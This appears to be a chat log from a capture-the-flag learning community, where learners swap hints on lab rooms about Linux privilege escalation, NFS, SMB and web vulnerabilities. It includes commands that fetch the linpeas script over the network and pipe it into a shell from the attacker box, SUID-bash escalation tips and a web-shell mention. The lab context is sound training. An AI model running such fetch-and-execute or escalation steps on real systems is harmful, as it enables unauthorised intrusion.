i am on linux agency last task i want to find dalias flag i searched it quite a lot in viktors dir but didnt find anything great any hint would be appreciated
you'll need to log in as dalia
For the metasploit room, when i set lhost to my own tryhackme ip, i enter show options and still shows my own ip addr?
hi! did anyone try to solve the OWASP top 10 room? for some reason the webserver from command injection practical is not working in any browser whatsoever. however using curl i get responses and html back. did anyone else encounter this issue?
try this #site-support message
send screenshot
i dont have the flag for it i only have viktor flag
yup
so
the goal of the game here is priv esc
what could i send a screenshot of?
your terminal, the commands you ran
i have to privesc to dalias dir
is that what you mean
by exploiting suid binaries
if i am not wrong there was a command like perm xyz to find permissions to file can you help me with tha
that
you'll have to enumerate the system
by gobuster
thank you! it worked!
linpeas is a popular script
ok got it
it might find something interesting
thanks
it will list vulnerabilities
will linux.sh work
it was also a script like linpeas never mind let me try it
i can be wrong
idk how i feel about sending the screenshot with my ips on it tbh i dont think it was anything wrong with the commands i ran but maybe something wrong with the vpn config file or something? When i ran the set LHOST "thm_ip" then i ran show options and my own ip showed up
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh i used this but current speed remains 0
there's no internets on the targets
ohh
grab it locally and serve it via a python server or something
well, if you don't want to send screenshots thats okay, but it will make it harder to troubleshoot, also, showing your private ip is not a problem, unless one of us is in your network we cant talk to your machine, but if it makes you feel better you can take a screenshot and edit it in a image editing software to hide the ips at least for us to know what is going on, but again, no problem showing your private and vpn ips here
Room: Network Services 2
Task: 4 - Exploiting NFS
Been having issues with this task but have been figuring my way through it until now. It gave instructions to add SUID bit permission to bash file using "sudo chmod +[permission] bash" did that, didnt work, still couldnt run the bash file until I did "sudo chmod ### bash" then I did "sudo chmod +[permission] bash".
Now i got the permissions how they are supposed to be, I SSH into the machine as the user, run bash, I get a bash shell. problem is the bash shell has literally zero privileges to run anything. So I can't find the root flag.
Would someone mind advising me where I am going wrong. Not asking for a solution just a nudge in the right direction.
ty for understanding and i just dont feel comfortable doing it honestly. But I feel my question is more geared towards a technical issue. I have completed this room already and I am running through it again for fun. When I originally did it I had a subscription (now I don't). So is it normal even though I set LHOST to the thm ip to show my priv ip on my end?
@hazy sequoia there's a flag you need to stop bash dropping suid permissions
You can find it with research
Verify with the bot, screenshot what you're doing
sorry i meant linenum
doesn't seem normal
was it for me
actually i meant linenum instead of linux.sh
yes
they both do similar things
i wanted a screenshot because i've seen people having problems by setting the lhost for the wrong module
what do you mean, I am literally in the bash shell now
tbh i dont know how to serve it from python server is there any site where i can learn it
I mean exactly what I said. When running the bash binary, you need to use a flag to stop it dropping suid permissions.
setting the lhost and it not changing doesn't have anything to do with your vpn, all of this setting up of the metasploit is going on in your machine, it will speak to the network only when it runs
But also ls -lah and screenshot
so when I run metasploit that will connect my thm ip?
python3 -m http.server 8000 will open a web server on port 8000
@hazy sequoia exit that shell. Then try again in the directory that the binary is in.
the ips need to be right, if the metasploit isn't changing you are either doing something wrong or theres something wrong in your machine, this has nothing to do with your subscription
how to serve linpeas from there
it'll serve from whatever directory you're in
but i think i'll have to modify the command of linpeas
you mean here?
gotcha and I will try to figure this out again at a later time. Thank you for your help
is it for me
curl 10.x.x.x:8000/linpeas.sh | /bin/bash
Notice how it's owned by cappuccino?
or sh, whatevs
It needs to be root owned
Your permissions are also a bit messed up
The s should be lowercase
those r the only permissions that would allow the question to be completed
S means suid but not executable.
You could argue, or you could listen
i ran the command as it said but i kept getting the upper case S
or +x
Then add suid
From your own machine. As root. Where it's mounted.
you may need to sudo
you didn't download it properly
at least you didn't get the raw version
but you got an html page
From the network services room
"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
ah I don't seem to be able to upload photos
!docs verify
what looks interesting?
what should i do then
with this link
I'm not sure how to read the files, tried using vi, vim, nano, and cat and get invalid argument errors
using the attackbox hosted through the site
you can get them and read locally
You're in an smbclient shell
Not a linux or windows command shell
ah alright, tried the get command and it worked, now just gotta look up how to choose where to save the files
thanks friends
you'll by default save to the location you opened the shell from
i have to use it on my local machine or vim
What
??
now I'm lost...
ty for the assist
hey i am doing it for first time please dont lose hope
you get the script from the internet to your attack box, then from the attack box to the target vm
how to do it from attack box to vim
with the python server?
i got the receiving connection to python server but gave an error 404
where did you store the script?
oh you did a git clone
yes
so you need to add the right folder when you get from the vm
you're serving from /home/kali
the script is in /home/kali/privilege-escalation-awesome-scripts-suite/linPEAS
so i have to change cmd
Still stuck on this question, completed the rest of the questions and found the authentication key. but can't find a profile name anywhere
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
Did you read the file with the long name?
probably a name inside it
Cant figure out how to get it
ah, guess \ doesn't escape that
oh
Use quotes
I see now. Thank you. need to try to remember rules will be different in different shells.
Hi!
Can anyone give me a hint for the room Year of the Rabbit ?
I can speak in a private message so i don't spoil anybody
Thanks!
pm me
Do not provide or ask for help or hints for TOC2 room until 8th Feb, 7pm (GMT)
good evening everyone. I am doing the Relevant and i am probably over complicating things. Anyone available for a hint?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Got it!
Room: Relevant - Penetration Testing Challenge
Stage: Enumerating for the first shell, got 1 working account and enumerated all available accounts. Saw the obvious CVEs but they are not working correctly. Also have the available shares.
Tools used so far: nmap, gobuster (didnt find anything), null session rpc and with accounts, smbmap and smbclient, tried psexec with impacket but nothing. Also tried to rdp on it but can't make it. Going for hydra now but i think it is overkill. Tried metasploit but since it is not needed, just gave up on it.
check the shares a bit more closely
Got the first one available, but the other 2 are not working. I can use another one but dunno if its the right way
also the directory-list-2.3-medium.txt list might give results
hmm maybe i misused gobuster, gonna see it again
should be enough to put you back on track
I am trying to access evilshell.php but my connection constantly times out?OWASP top 10 anyone else have a problem?
nevermind Im an idiot!!
can anyone help me out with crack the hash2 how do i create a border mutation rule for JtR using numbers and special characters?
I am doing Day 14 Where's Rudolf? Of Learn Cyber Security in 25 days series, I want to find the password for Rudolph's email breach but the recommended free site : scylla.sh is down, unable to find another free site like that, can anyone suggest a good site, thanks.
Hi! I finally got it, thanks!!!
Archangel room. Nice rickroll XD. is backup SUID file just a red herring?
Have you tried to exploit it?
mhm. I don't seem to understand how? Should i transfer it to my local and do RE ?
You need to try and understand what it's doing, I'm sure you can probably use Ghidra too but it is much more simple to find out than that.
aha i see
I'm using smbclient and need to find out who owns a file - I can't find how I'd do this anywhere unless I've missed something on the smbclient help page?
I don't think you need to do that.
On having a break and re reading the question I just realised
Still not got it but hopefully will at some point!
Thanx, I'll check that one out
Just finished toc2 by @hallow carbonmints . Learned something new from the root part. Thanks a lot - it was fun